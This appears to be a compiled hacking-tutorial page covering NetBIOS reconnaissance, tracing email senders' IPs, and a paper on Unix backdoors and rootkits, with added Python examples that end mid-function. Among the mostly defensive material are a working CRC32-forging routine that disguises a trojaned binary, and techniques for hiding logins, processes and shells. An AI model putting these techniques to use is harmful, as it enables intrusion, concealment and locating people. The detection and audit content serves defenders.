SE-SSCS-CV112C8<20> UNIQUE Registered
ADS <1E> GROUP Registered
ADRIAN <03> UNIQUE Registered

MAC Address = 00-04-76-39-B6-D9
C:\>


On Unix:

[root@tux /root]# nmblookup se-sscs-cv112c8
querying se-sscs-cv112c8 on 192.168.31.255
192.168.22.68 se-sscs-cv112c8<00>
[root@tux /root]#
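
The packet behind nbtstat -A and nmblookup -S, as an added example that is not part of the original tutorial: it builds the NetBIOS Name Service "node status" query (type 0x0021 for the wildcard name "*", sent to UDP/137) and parses the reply into the name table and MAC address that the tools print. SAMPLE_REPLY is the hex dump printed by the Unix nbtstat run above, rebuilt field by field so the parser runs offline; node_status() sends a live query and needs network access.

```python
# Added example (not from the original tutorial): the NetBIOS Name Service
# node status request sent by nbtstat -A / nmblookup -S, and a parser for the
# reply. SAMPLE_REPLY is the hex dump shown on this page, rebuilt as bytes.
import os
import socket
import struct

NB_PORT = 137
NBSTAT = 0x0021              # record type of a node status request/reply

# (suffix, is_group) -> role, as nbtstat labels them
SUFFIX_ROLE = {
    (0x00, False): "Workstation Service",
    (0x00, True): "Domain Name",
    (0x03, False): "Messenger Service",
    (0x20, False): "File Server Service",
    (0x1E, True): "Potential Master Browser",
}


def encode_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: the 16-byte name (15 chars + suffix) is split into
    nibbles and each nibble is written as 'A' + nibble, giving 32 letters.
    The wildcard '*' is followed by 15 NULs, hence CKAAAA...A in the dump."""
    if name == "*":
        raw = b"*" + bytes(15)
    else:
        raw = name.upper().ljust(15).encode("ascii")[:15] + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))


def build_node_status_query(txid: int) -> bytes:
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)   # one question
    question = b"\x20" + encode_name("*") + b"\x00" + struct.pack(">HH", NBSTAT, 1)
    return header + question


def parse_node_status_reply(pkt: bytes) -> dict:
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a response carrying an answer")
    pos = 12
    while pkt[pos]:                  # skip the echoed question name (length-prefixed labels)
        pos += 1 + pkt[pos]
    pos += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", pkt[pos:pos + 10])
    pos += 10
    if rtype != NBSTAT:
        raise ValueError(f"unexpected record type 0x{rtype:04x}")
    rdata = pkt[pos:pos + rdlen]
    count = rdata[0]
    names = []
    for i in range(count):           # 18-byte entries: 15 name, 1 suffix, 2 flags
        entry = rdata[1 + 18 * i:19 + 18 * i]
        suffix = entry[15]
        group = bool(struct.unpack(">H", entry[16:18])[0] & 0x8000)   # G bit
        names.append({"name": entry[:15].decode("latin-1").rstrip(), "suffix": suffix,
                      "group": group, "role": SUFFIX_ROLE.get((suffix, group), "unknown")})
    stats = rdata[1 + 18 * count:]   # node statistics; the MAC address comes first
    return {"txid": txid, "names": names, "mac": "-".join(f"{b:02X}" for b in stats[:6])}


def node_status(ip: str, timeout: float = 2.0) -> dict:
    txid = int.from_bytes(os.urandom(2), "big")
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_node_status_query(txid), (ip, NB_PORT))
        data, _peer = sock.recvfrom(2048)
    reply = parse_node_status_reply(data)
    if reply["txid"] != txid:
        raise ValueError("reply does not match our transaction id")
    return reply


def _entry(name: str, suffix: int, flags: int) -> bytes:
    return name.ljust(15).encode("ascii") + bytes([suffix]) + struct.pack(">H", flags)


# The reply from the hex dump above (bytes past RDLENGTH, which were only
# leftover receive buffer, are dropped).
SAMPLE_REPLY = (
    bytes.fromhex("A248 8400 0000 0001 0000 0000")
    + b"\x20" + encode_name("*") + b"\x00"
    + struct.pack(">HHIH", NBSTAT, 1, 0, 0x9B)
    + b"\x06"
    + _entry("SE-SSCS-CV112C8", 0x00, 0x4400)
    + _entry("ADS", 0x00, 0xC400)
    + _entry("SE-SSCS-CV112C8", 0x03, 0x4400)
    + _entry("SE-SSCS-CV112C8", 0x20, 0x4400)
    + _entry("ADS", 0x1E, 0xC400)
    + _entry("ADRIAN", 0x03, 0x4400)
    + bytes.fromhex("0004 7639 B6D9") + bytes(40)
)

if __name__ == "__main__":
    for n in parse_node_status_reply(SAMPLE_REPLY)["names"]:
        kind = "GROUP" if n["group"] else "UNIQUE"
        print(f'{n["name"]:<16}<{n["suffix"]:02X}> {kind:<7}{n["role"]}')
```

The 0x8000 bit of each entry's flags is what separates ADS<00> (group, the domain name) from SE-SSCS-CV112C8<00> (unique, the workstation service); the <03> entry that is not the machine name is the Messenger Service registration of the logged-on user, which is how section 10 below reads the user name off the table.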

10. How do I find out who is logged into a remote Windows system?

On Windows you can try nbtstat; the <03> unique name that is not the machine name is the Messenger Service registration of the logged-on user (JDOE below):

C:\>nbtstat -a somesystem
Local Area Connection:

Node IpAddress: [192.168.22.68] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SE-SSCS-CV112C5<00> UNIQUE Registered
ADS <00> GROUP Registered
SE-SSCS-CV112C5<03> UNIQUE Registered
ADS <1E> GROUP Registered
JDOE <03> UNIQUE Registered

MAC Address = 00-04-76-39-A9-F9
C:\>

But if NetBIOS over TCP/IP is turned off it won't work.
In that case you may have to use WMI (for example "wmic /node:somesystem computersystem get username"), but you would have to be an admin on the remote box.
On Unix:

bash-2.05# nmblookup -S somebox
querying se-sscs-cv112c5 on 192.168.31.255
192.168.22.59 somebox <00>
Looking up status of 192.168.22.59
SE-SSCS-CV112C5 <00> - M
ADS <00> - M
SE-SSCS-CV112C5 <03> - M
ADS <1e> - M
JDOE <03> - M

bash-2.05#
The above only works if the Windows box has NetBIOS over TCP/IP turned on. (On Windows Vista and later the Messenger Service no longer exists, so the user name does not show up in the NetBIOS name table at all.)

11. How do I find out the IP address from mail I have received?

I am just going to explain two of the most popular mail services:
1. Yahoo
2. Hotmail

1. Yahoo

To find the IP address from mail you have received you must look at the headers of the mail. To enable them do the following.

After signing in with your ID and password you are on the welcome page. In the top right corner you can find Options; click it.
This takes you to a page where you can find Anti-Spam Resource Centre, Block Addresses, Filters, General Preferences, Signature, etc.

Click General Preferences.
Under Messages you can find Headers, Font size, etc.
Select the option "Show all headers on incoming messages" and click the Save button at the bottom.

Now open a mail and it will look something like this:

X-Apparently-To: boo_iggers@yahoo.com via 68.142.207.223; Sat, 08 Oct 2005 00:16:20 -0700
X-Originating-IP: [66.163.179.108]
Return-Path:
Authentication-Results: mta251.mail.mud.yahoo.com from=yahoo.com; domainkeys=pass (ok)
Received: from 66.163.179.108 (HELO web35314.mail.mud.yahoo.com) (66.163.179.108) by mta251.mail.mud.yahoo.com with SMTP; Sat, 08 Oct 2005 00:16:20 -0700
Received: (qmail 59981 invoked by uid 60001); 8 Oct 2005 07:16:04 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=y/8AiVLdM96BbwqqWGE4jVGW9HvwN3HPkeChVmy75EKnxDer6AHQYZo V0HtC9PkFQS1AseKIaxvHyf9N9YMwhCSLzo3Of4AsQzF2KWQ3ZdxxOQLlL1LBryd5cfSIgu6wuP3TDEPSJZDPCAR1kZ138L7sd24SUOoj7AoDTV60150= ; Message-ID: <20051008071604>
Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT
Date: Sat, 8 Oct 2005 00:16:03 -0700 (PDT)
From: "james carner"
Subject: Fwd: collegelife
To: raam_naam_satya_hai@yahoo.com
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="0-714430323-1128755763=:58781"
Content-Transfer-Encoding: 8bit
Content-Length: 417230


Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT

where 59.92.35.72, in square brackets, is the IP address of the machine the sender used: Yahoo's webmail server records the address of the browser that submitted the message. Read the Received: headers from the bottom up. Each relay adds its own header at the top, so the bottom-most one is the first hop. Only the headers added by your own provider's servers can be trusted; anything below them could have been forged by the sender. Note also that X-Originating-IP here (66.163.179.108) is Yahoo's own web server, not the sender.

2. Hotmail

After logging in, in the top right corner you can find Options; click it.
Then click Mail on the left, under Personal, and click Mail Display Settings.
Select Full under Message Headers and click OK.

Then in the mail you can see something like this:

MIME-Version: 1.0
Received: from web32514.mail.mud.yahoo.com ([68.142.207.224]) by bay0-mc1-f15.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Tue, 20 Dec 2005 02:01:10 -0800
Received: (qmail 48874 invoked by uid 60001); 20 Dec 2005 10:01:09 -0000
Received: from [59.92.97.178] by web32514.mail.mud.yahoo.com via HTTP; Tue, 20 Dec 2005 02:01:09 PST
X-Message-Info: JGTYoYF78jGeFkOXv4J7uO2ag1L4jHLrO91IFQszAj4=
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=ChOifmyOhue+LKXKIxMj9fnDxP56wkOvrq0jwgf+H558LTYsjEBKd0sTlmqcHqVAjv/0ormxPKAsb252f4nSweX/36aKWe30b7OnaCqk1Z8ZxytmQVSY19LC5MI42T/s7hpiTb7tbIg8nipPJTtA8+xzXNkoUKzMI+PQVKXFFmk= ;
Return-Path: raam_naam_satya_hai@yahoo.com
X-OriginalArrivalTime: 20 Dec 2005 10:01:10.0963 (UTC) FILETIME=[4DEC6830:01C6054C]

Received: from [59.92.97.178] by web32514.mail.mud.yahoo.com via HTTP; Tue, 20 Dec 2005 02:01:09 PST

Here 59.92.97.178 is the IP of the person who sent this mail to me: again the bottom-most Received: header, added by Yahoo's webmail server when the sender submitted the message.
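
Walking the Received: chain by script, as an added example that is not part of the original tutorial: it unfolds each Received: header, pulls out the addresses it carries, and returns the public address recorded by the earliest hop. It refuses to answer unless the newest hop was stamped by a relay you name as trusted, since everything below the first trusted header is under the sender's control. SAMPLE_HEADERS is the Yahoo header block from this page, trimmed to the lines that matter.

```python
# Added example (not from the original tutorial): find the originating IP in
# a message's Received: chain. SAMPLE_HEADERS is the Yahoo example from this
# page, trimmed; the trusted-relay list is an assumption the caller supplies.
import email
import ipaddress
import re
from typing import List, Optional

SAMPLE_HEADERS = """\
X-Apparently-To: boo_iggers@yahoo.com via 68.142.207.223; Sat, 08 Oct 2005 00:16:20 -0700
X-Originating-IP: [66.163.179.108]
Received: from 66.163.179.108 (HELO web35314.mail.mud.yahoo.com) (66.163.179.108)
  by mta251.mail.mud.yahoo.com with SMTP; Sat, 08 Oct 2005 00:16:20 -0700
Received: (qmail 59981 invoked by uid 60001); 8 Oct 2005 07:16:04 -0000
Received: from [59.92.35.72] by web35314.mail.mud.yahoo.com via HTTP; Sat, 08 Oct 2005 00:16:03 PDT
Date: Sat, 8 Oct 2005 00:16:03 -0700 (PDT)
Subject: Fwd: collegelife
To: raam_naam_satya_hai@yahoo.com

"""

IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")


def received_hops(raw: str) -> List[dict]:
    """Each relay prepends its own Received: header, so index 0 is the last
    hop (your provider) and the final index is the first hop (the origin)."""
    msg = email.message_from_string(raw)
    hops = []
    for idx, value in enumerate(msg.get_all("Received", [])):
        value = " ".join(value.split())             # unfold continuation lines
        ips = []
        for cand in IPV4_RE.findall(value):
            try:
                ips.append(ipaddress.ip_address(cand))
            except ValueError:
                pass                                # e.g. 999.1.1.1 is not an address
        hops.append({"index": idx, "header": value, "ips": ips})
    return hops


def origin_ip(raw: str, trusted_relays: List[str]) -> Optional[str]:
    """Public address recorded by the earliest hop, or None if the newest hop
    was not stamped by one of the relays we trust (then nothing below it can
    be believed either: the sender may have typed those headers in)."""
    hops = received_hops(raw)
    if not hops or not any(r in hops[0]["header"] for r in trusted_relays):
        return None
    for hop in reversed(hops):                      # earliest hop first
        for ip in hop["ips"]:
            if ip.is_global:                        # skip 10/8, 192.168/16, loopback, ...
                return str(ip)
    return None


if __name__ == "__main__":
    for hop in received_hops(SAMPLE_HEADERS):
        print(hop["index"], [str(ip) for ip in hop["ips"]])
    print("origin:", origin_ip(SAMPLE_HEADERS, ["mail.mud.yahoo.com"]))   # 59.92.35.72
```

For a message in your own mailbox the trusted relay is your provider's MTA; hand the script the raw message source (all headers, not the webmail summary) and it will report the first public address in the chain.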

=============================================================

A video On Completely Taking Over A Remote PC :

Hiya Hackerz,
Here I'm posting another video made by me that shows how to get into a remote PC and completely take over the PC.
Shocked!! But this is true...............
Check it out.............

Click here to download this video
SAM: Windows NT and XP are based on the concept of the SAM (Security Accounts Manager).
Password hashes and other account data are stored in the SAM file.
System Backdoor explained :

Since the early days of intruders breaking into computers, they have tried to develop techniques or backdoors that allow them to get back into the system. This paper focuses on many of the common backdoors and possible ways to check for them. Most of the focus is on Unix backdoors, with some discussion of future Windows NT backdoors. It describes the complexity of the issues in trying to determine the methods that intruders use, and gives administrators a basis for understanding how they might be able to stop intruders from getting back in. When an administrator understands how difficult it is to stop an intruder once they are in, the value of being proactive and blocking the intruder from ever getting in becomes better understood. This is intended to cover many of the popular backdoors commonly used by beginner and advanced intruders. It is not intended to cover every possible way to create a backdoor, as the possibilities are limitless.


The backdoor, for most intruders, provides two or three main functions:

1. Be able to get back into a machine even if the administrator tries to secure it, e.g., by changing all the passwords.

2. Be able to get back into the machine with the least amount of visibility. Most backdoors provide a way to avoid being logged, and many times the machine can appear to have no one online even while an intruder is using it.

3. Be able to get back into the machine in the least amount of time. Most intruders want to easily get back into the machine without having to do all the work of exploiting a hole to gain access.


In some cases, if the intruder thinks the administrator may detect any installed backdoor, they will resort to using the vulnerability repeatedly to get onto the machine, as the only backdoor, thus not touching anything that may tip off the administrator. Therefore in some cases the vulnerabilities on a machine remain the only unnoticed backdoor.


Password Cracking Backdoor

One of the first and oldest methods intruders used to gain not only access to a Unix machine but also backdoors was to run a password cracker. This uncovers accounts with weak passwords. All these accounts are now possible backdoors into a machine even if the system administrator locks out the intruder's current account. Many times the intruder will look for unused accounts with easy passwords and change the password to something difficult. When the administrator looks for all the weakly passworded accounts, the accounts with modified passwords will not appear. Thus the administrator will not be able to easily determine which accounts to lock out.


Rhosts + + Backdoor

On networked Unix machines, services like rsh and rlogin used a simple authentication method based on host names that appear in .rhosts. A user could easily configure which machines would not require a password to log in from. An intruder that gained access to someone's .rhosts file could put a "+ +" in the file, and that would allow anyone from anywhere to log into that account without a password. Many intruders use this method, especially when NFS is exporting home directories to the world. These accounts become backdoors for intruders to get back into the system. Many intruders prefer using rsh over rlogin because it often lacks any logging capability. Many administrators check for "+ +", therefore an intruder may actually put in a host name and user name from another compromised account on the network, making it less obvious to spot.
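
A check for the .rhosts entries described above, as an added example that is not part of the paper: it parses the "host [user]" lines of a .rhosts or hosts.equiv file and flags every entry that trusts more than one named user on one named host, including the "+ +" wildcard, single-sided wildcards, and the quieter cross-account trust the last sentence warns about. The file contents are constructed; owner is the account the file grants access to.

```python
# Added example (not from the paper): audit ~/.rhosts or /etc/hosts.equiv
# for the "+ +" style trust holes described above. File contents are
# constructed; `owner` is the account the file grants access to.
from typing import List, Tuple

SAMPLE_RHOSTS = """\
# trusted build hosts
build1.example.net jdoe
+ +
+ root
-evil.example.net
badhost.example.net +
"""


def audit_rhosts(text: str, owner: str) -> List[Tuple[int, str, str]]:
    """Return (line_no, entry, finding) for every entry that trusts more than
    one named user on one named host. Line format is "host [user]"; "+" is a
    wildcard and a leading "-" on the host denies rather than grants."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()            # drop comments and blanks
        if not line:
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else owner  # no user field means the owner
        if host.startswith("-"):
            continue                                    # negative entries only deny
        if host == "+" and user == "+":
            findings.append((no, line, f"anyone from anywhere may log in as {owner} with no password"))
        elif host == "+":
            findings.append((no, line, f"{user} may log in as {owner} from any host"))
        elif user == "+":
            findings.append((no, line, f"every user on {host} may log in as {owner}"))
        elif user != owner:
            findings.append((no, line, f"cross-account trust: {user}@{host} may log in as {owner}"))
    return findings


if __name__ == "__main__":
    for no, entry, finding in audit_rhosts(SAMPLE_RHOSTS, "jdoe"):
        print(f"line {no}: {entry!r}: {finding}")
```

Run it over every home directory's .rhosts (and /etc/hosts.equiv with owner set to the account being checked); since host-name trust can be spoofed anyway, the right fix today is to remove rsh/rlogin altogether rather than to tidy the files.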


Checksum and Timestamp Backdoors

Early on, many intruders replaced binaries with their own trojan versions. Many system administrators relied on time-stamping and the system checksum programs, e.g., Unix's sum program, to try to determine when a binary file had been modified. Intruders have developed tools that recreate the same time-stamp for the trojan file as the original file. This is accomplished by setting the system clock back to the original file's time and then adjusting the trojan file's time to the system clock (or, more simply, by setting the modification time directly, as "touch -r original trojan" does). Once the trojan binary has exactly the same time as the original, the system clock is reset to the current time. The sum program relies on a short, non-cryptographic checksum (cksum uses a 32-bit CRC) and is easily spoofed: intruders have developed programs that modify the trojan binary so that it has the original checksum, thus fooling the administrators. MD5 checksums were the recommended choice of most vendors when this was written, because no one had yet shown how to spoof them. That is no longer the case: practical MD5 collisions have been demonstrated since 2004, so for file integrity today use SHA-256, and keep the reference hashes somewhere the intruder cannot rewrite them (read-only media or a separate host).
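
Why a short checksum is no integrity check, as an added example that is not part of the paper: a trojaned file is padded with four extra bytes chosen so that its CRC32 equals the original's, while a cryptographic hash still tells the two apart. The two "binaries" are constructed byte strings, and CRC32 stands in for the short checksums that sum and cksum produce; the forging step is the generic GF(2) linear-algebra method, not a tool from the paper.

```python
# Added example (not from the paper): forge a CRC32 so a trojaned file
# matches the original's checksum, and show SHA-256 still differs. The
# "binaries" are constructed byte strings.
import hashlib
import zlib


def forge_crc32(data: bytes, target: int) -> bytes:
    """Return 4 bytes p such that crc32(data + p) == target.

    For a fixed prefix and fixed patch length CRC32 is affine over GF(2):
    crc(data + p) = base XOR L(p), with L linear and invertible. Measure L on
    the 32 unit vectors, then solve L(p) = target XOR base with an XOR basis
    keyed by pivot bit (Gaussian elimination over GF(2))."""
    base = zlib.crc32(data + bytes(4))
    basis = {}                                  # pivot bit -> (vector, patch bits producing it)
    for j in range(32):
        vec = zlib.crc32(data + (1 << j).to_bytes(4, "big")) ^ base   # L(e_j)
        combo = 1 << j
        for bit in range(31, -1, -1):
            if not (vec >> bit) & 1:
                continue
            if bit in basis:
                bvec, bcombo = basis[bit]
                vec, combo = vec ^ bvec, combo ^ bcombo
            else:
                basis[bit] = (vec, combo)
                break
    want = target ^ base
    patch_bits = 0
    for bit in range(31, -1, -1):               # back-substitute
        if (want >> bit) & 1:
            bvec, bcombo = basis[bit]           # every pivot exists because L is invertible
            want, patch_bits = want ^ bvec, patch_bits ^ bcombo
    patch = patch_bits.to_bytes(4, "big")
    assert zlib.crc32(data + patch) == target
    return patch


def trojan_with_matching_crc(original: bytes, trojan: bytes) -> bytes:
    """Pad the trojan so it reports the same CRC32 as the original binary."""
    return trojan + forge_crc32(trojan, zlib.crc32(original))


def crc32(data: bytes) -> int:
    return zlib.crc32(data)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed stand-ins for /bin/login and a backdoored build of it.
ORIGINAL = b"\x7fELF login v1: compare(password, stored) ... " * 4
TROJAN = b"\x7fELF login v1: if pw == backdoor: shell(); compare(password, stored) ... " * 4

if __name__ == "__main__":
    forged = trojan_with_matching_crc(ORIGINAL, TROJAN)
    print("crc32  original", f"{crc32(ORIGINAL):08x}", " forged", f"{crc32(forged):08x}")
    print("sha256 original", sha256(ORIGINAL)[:16], " forged", sha256(forged)[:16])
```

Four spare bytes at the end of an executable are easy to hide (a trailing section, or padding), which is why a 32-bit CRC, however it is computed, cannot serve as a tamper check; the collision resistance of a cryptographic hash is exactly the property this attack lacks against SHA-256.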


Login Backdoor

On Unix, the login program is the software that usually does the password authentication when someone telnets to the machine. Intruders grabbed the source code to login.c and modified it so that when login compared the user's password with the stored password, it would first check for a backdoor password. If the user typed in the backdoor password, it would allow them to log in regardless of what the administrator set the passwords to. Thus this allowed the intruder to log into any account, even root. The password backdoor would spawn the shell before the point where the login is recorded in utmp and wtmp. Therefore an intruder could be logged in and have shell access without it appearing that anyone is on that machine under that account. Administrators started noticing these backdoors, especially if they ran the "strings" command to find what text was in the login program: many times the backdoor password would show up. The intruders then encrypted or hid the backdoor password better so it would not appear by just running strings. Many administrators can detect these backdoors by comparing cryptographic checksums of the login binary (MD5 at the time; SHA-256 today) against a known-good copy.


Telnetd Backdoor

When a user telnets to the machine, the inetd service listens on the port, receives the connection, and then passes it to in.telnetd, which then runs login. Some intruders knew the administrator was checking the login program for tampering, so they modified in.telnetd. Within in.telnetd, it does several checks on input from the user for things like what kind of terminal the user is using. Typically, the terminal setting might be Xterm or VT100. An intruder could backdoor it so that when the terminal was set to "letmein", it would spawn a shell without requiring any authentication. Intruders have backdoored some services so that any connection from a specific source port can spawn a shell.


Services Backdoor

Almost every network service has at one time been backdoored by an intruder. Backdoored versions of finger, rsh, rexec, rlogin, ftp, even inetd, etc., have been floating around forever. There are programs that are nothing more than a shell connected to a TCP port with maybe a backdoor password to gain access. These programs sometimes replace a service like uucp that never gets used, or they get added to the inetd.conf file as a new service. Administrators should be very wary of what services are running and analyze the original services by MD5 checksums.


Cronjob backdoor

Cronjob on Unix schedules when certain programs should be run. An intruder could add a backdoor shell program to run between 1 AM and 2 AM. So for 1 hour every night, the intruder could gain access. Intruders have also looked at legitimate programs that typically run in cronjob and built backdoors into those programs as well.


Library backdoors

Almost every UNIX system uses shared libraries. The shared libraries are intended to reuse many of the same routines, thus cutting down on the size of programs. Some intruders have backdoored some of the routines like crypt.c and _crypt.c. Programs like login.c would use the crypt() routine, and if a backdoor password was used it would spawn a shell. Therefore, even if the administrator was checking the MD5 of the login program, it was still spawning a backdoor routine, and many administrators were not checking the libraries as a possible source of backdoors.

One problem for many intruders was that some administrators started MD5 checksums of almost everything. One method intruders used to get around that is to backdoor the open() and file access routines. The backdoor routines were configured to read the original files, but execute the trojan backdoors. Therefore, when the MD5 checksum program was reading these files, the checksums always looked good. But when the system ran the program, it executed the trojan version. Even the trojan library itself could be hidden from the MD5 checksums. One way an administrator could get around this backdoor was to statically link the MD5 checksum checker and run it on the system. The statically linked program does not use the trojan shared libraries.


Kernel backdoors

The kernel on Unix is the core of how Unix works. The same method used for libraries for bypassing MD5 checksums could be used at the kernel level, except even a statically linked program could not tell the difference. A good backdoored kernel is probably one of the hardest to find by administrators; fortunately, kernel backdoor scripts have not yet been widely made available and no one knows how widespread they really are.


File system backdoors

An intruder may want to store their loot or data on a server somewhere without the administrator finding the files. The intruder's files can typically contain their toolbox of exploit scripts, backdoors, sniffer logs, copied data like email messages, source code, etc. To hide these sometimes large files from an administrator, an intruder may patch the file system commands like "ls", "du", and "fsck" to hide the existence of certain directories or files. At a very low level, one intruder's backdoor created a section on the hard drive with a proprietary format that was designated as "bad" sectors on the hard drive. Thus an intruder could access those hidden files only with special tools, but to the regular administrator it is very difficult to determine that the marked "bad" sectors were indeed a storage area for the hidden file system.


Bootblock backdoors

In the PC world, many viruses have hidden themselves within the bootblock section, and most antivirus software will check to see if the bootblock has been altered. On Unix, most administrators do not have any software that checks the bootblock; therefore some intruders have hidden some backdoors in the bootblock area.


Process hiding backdoors

An intruder many times wants to hide the programs they are running. The programs they want to hide are commonly a password cracker or a sniffer. There are quite a few methods, and here are some of the more common:

An intruder may write the program to modify its own argv[] to make it look like another process name.

An intruder could rename the sniffer program to a legitimate service like in.syslog and run it. Thus when an administrator does a "ps" or looks at what is running, the standard service names appear.

An intruder could modify the library routines so that "ps" does not show all the processes.

An intruder could patch a backdoor or program into an interrupt driven routine so it does not appear in the process table. An example backdoor using this technique is amod.tar.gz, available on http://star.niimm.spb.su/~maillist/bugtraq.1/0777.html

An intruder could modify the kernel to hide certain processes as well.


Rootkit

One of the most popular packages to install backdoors is rootkit. It can easily be located using Web search engines. From the Rootkit README, here are the typical files that get installed:

z2 - removes entries from utmp, wtmp, and lastlog.
es - rokstar's ethernet sniffer for sun4 based kernels.
fix - try to fake checksums, install with same dates/perms/u/g.
sl - become root via a magic password sent to login.
ic - modified ifconfig to remove PROMISC flag from output.
ps - hides the processes.
ns - modified netstat to hide connections to certain machines.
ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.


Network traffic backdoors

Not only do intruders want to hide their tracks on the machine, but they also want to hide their network traffic as much as possible. These network traffic backdoors sometimes allow an intruder to gain access through a firewall. There are many network backdoor programs that allow an intruder to set up on a certain port number on a machine that will allow access without ever going through the normal services. Because the traffic is going to a non-standard network port, the administrator can overlook the intruder's traffic. These network traffic backdoors typically use TCP, UDP, and ICMP, but they could use many other kinds of packets.


TCP Shell Backdoors

The intruder can set up these TCP Shell backdoors on some high port number, possibly where the firewall is not blocking that TCP port. Many times, they will be protected with a password just so that an administrator that connects to it will not immediately see shell access. An administrator can look for these connections with netstat to see what ports are listening and where current connections are going to and from. Many times, these backdoors allow an intruder to get past TCP Wrapper technology. These backdoors could be run on the SMTP port, on which many firewalls allow traffic to pass for e-mail.


UDP Shell Backdoors

Administrators many times can spot a TCP connection and notice the odd behavior, while UDP shell backdoors lack any connection, so netstat would not show an intruder accessing the Unix machine. Many firewalls have been configured to allow UDP packets for services like DNS through. Many times, intruders will place the UDP Shell backdoor on that port and it will be allowed to bypass the firewall.


ICMP Shell Backdoors

Ping is one of the most common ways to find out if a machine is alive, by sending and receiving ICMP packets. Many firewalls allow outsiders to ping internal machines. An intruder can put data in the Ping ICMP packets and tunnel a shell between the pinging machines. An administrator may notice a flurry of Ping packets, but unless the administrator looks at the data in the packets, an intruder can go unnoticed.


Encrypted Link

An administrator can set up a sniffer to see whether the data looks like someone accessing a shell, but an intruder can add encryption to the Network traffic backdoors and it becomes almost impossible to determine what is actually being transmitted between two machines.


Windows NT

Because Windows NT does not easily allow multiple users on a single machine and remote access similar to Unix, it becomes harder for the intruder to break into Windows NT, install a backdoor, and launch an attack from it. Thus you will more frequently find network attacks that are springboarded from a Unix box than from Windows NT. As Windows NT advances in multi-user technologies, this may give a higher frequency of intruders who use Windows NT to their advantage. And if this does happen, many of the concepts from Unix backdoors can be ported to Windows NT and administrators can be ready for the intruder. Today, there are already telnet daemons available for Windows NT. With Network Traffic backdoors, they are very feasible for intruders to install on Windows NT.


Solutions

As backdoor technology advances, it becomes even harder for administrators to determine if an intruder has gotten in or if they have been successfully locked out.


Assessment

One of the first steps in being proactive is to assess how vulnerable your network is, thus being able to figure out what holes exist that should be fixed. Many commercial tools exist to help scan and audit the network and systems for vulnerabilities. Many companies could dramatically improve their security if they only installed the security patches made freely available by their vendors.


MD5 Baselines

One necessary component of a system scanner is MD5 checksum baselines. This MD5 baseline should be built up before a hacker attack, with clean systems. Once a hacker is in and has installed backdoors, trying to create a baseline after the fact could incorporate the backdoors into the baseline. Several companies had been hacked and had backdoors installed on their systems for many months. Over time, all the backups of the systems contained the backdoors. When some of these companies found out they had a hacker, they restored a backup in hopes of removing any backdoors. The effort was futile since they were restoring all the files, even the backdoored ones. The binary baseline comparison needs to be done before an attack happens.
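As an added example (mine, not code from the document), here is a baseline builder and comparer in the spirit of the section above: it hashes every regular file under a root, stores the result, and later reports added, removed and modified files, so a forged timestamp or a spoofed CRC changes nothing. The hash algorithm is a parameter (I default to SHA-256; the document names MD5) and the files in demo() are constructed; as the library and kernel sections warn, the comparison is only trustworthy when the checker itself runs from clean, statically linked or read-only media.

```python
"""Build a file-hash baseline on a clean system and compare it later.

Added example; not code from the original document. It hashes a directory
tree with hashlib; the algorithm is a parameter (sha256 by default, my
choice; the document names MD5) and the files in demo() are constructed.
"""
import hashlib
import json
import os
import tempfile


def hash_file(path, algorithm="sha256", chunk_size=65536):
    """Hash one file in chunks so large binaries are not read into memory at once."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, algorithm="sha256"):
    """Map relative path -> digest for every regular file under root.

    Symlinks are skipped so a link planted by an intruder cannot redirect the
    walk, and only content is hashed: a forged timestamp changes nothing here.
    """
    baseline = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = sorted(d for d in dirnames if not os.path.islink(os.path.join(dirpath, d)))
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            baseline[os.path.relpath(full, root)] = hash_file(full, algorithm)
    return baseline


def compare_baseline(old, new):
    """Return the files that were added, removed, or whose digest changed."""
    old_paths, new_paths = set(old), set(new)
    return {
        "added": sorted(new_paths - old_paths),
        "removed": sorted(old_paths - new_paths),
        "modified": sorted(p for p in old_paths & new_paths if old[p] != new[p]),
    }


def save_baseline(baseline, path):
    """Write the baseline as JSON; keep the copy somewhere the host cannot alter."""
    with open(path, "w") as f:
        json.dump(baseline, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed scenario: baseline a tiny bin/ tree, then trojan it."""
    with tempfile.TemporaryDirectory() as root, tempfile.TemporaryDirectory() as store:
        bindir = os.path.join(root, "bin")
        os.makedirs(bindir)
        for name in ("login", "ls"):
            with open(os.path.join(bindir, name), "wb") as f:
                f.write(b"original %s binary (constructed sample)\n" % name.encode())
        clean = build_baseline(root)
        # The baseline is stored outside the tree it describes (here: a second temp dir).
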